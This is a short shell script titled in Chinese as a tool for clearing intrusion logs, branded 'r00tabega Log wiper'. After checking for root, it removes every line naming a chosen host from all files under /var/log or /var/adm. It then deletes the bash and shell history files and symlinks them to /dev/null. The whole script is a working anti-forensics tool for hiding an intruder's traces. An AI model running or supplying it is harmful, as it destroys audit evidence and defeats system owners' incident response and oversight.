|
清除入侵日志的一个脚本
#!/bin/sh
idiot_check()
{
CUID=`id / awk '{ print $1 }'/cut -b 5`
if [ "$CUID" != "0" ];
then
echo
echo -e "Must be run as root."
echo
exit 1
else
getownedbyname;
fi
}
getownedbyname()
{
echo
echo -e "r00tabega Log wiper, version 0.5 -By Tutor"
echo -e "http://www.r00tabega.com"
echo
echo -e "Hostname [or string] to make a ghost in the logs? \c"
read HOST
if [ "$HOST" == "" ];
then
echo -e "Nothing done..."
exit 1
fi
if [ -d "/var/adm" ];
then
DIR="adm"
else
DIR="log"
fi
echo -e "Cleaning out /var/$DIR"
cd /var/$DIR;
LOGS=`ls -1 /var/$DIR`
for LOG in $LOGS
do
grep -v "$HOST" /var/$DIR/$LOG >> /var/$DIR/TempFile
rm /var/$DIR/$LOG
mv TempFile /var/$DIR/$LOG
touch /var/$DIR/$LOG
chmod 0640 /var/$DIR/$LOG
sleep 1
done
cleanup;
}
cleanup()
{
echo
echo "Logs are good, now for shell history files..."
echo
echo -e "Remove shell history files? [Y/N]: \c"
read SLOG
if [ "$SLOG" == "" ];
then
cleanup;
elif [ "$SLOG" == "n" -o "$SLOG" == "N" ];
then
echo
echo "Shell history files left alone, good luck."
exit 1
elif [ "$SLOG" == "y" -o "$SLOG" == "Y" ];
then
rm -rf ~/.bash_history;
ln -s /dev/null ~/.bash_history
rm -rf ~/.history;
ln -s /dev/null ~/.history
sleep 1
echo
echo -e "All clean, go about your business..."
fi
}
idiot_check; |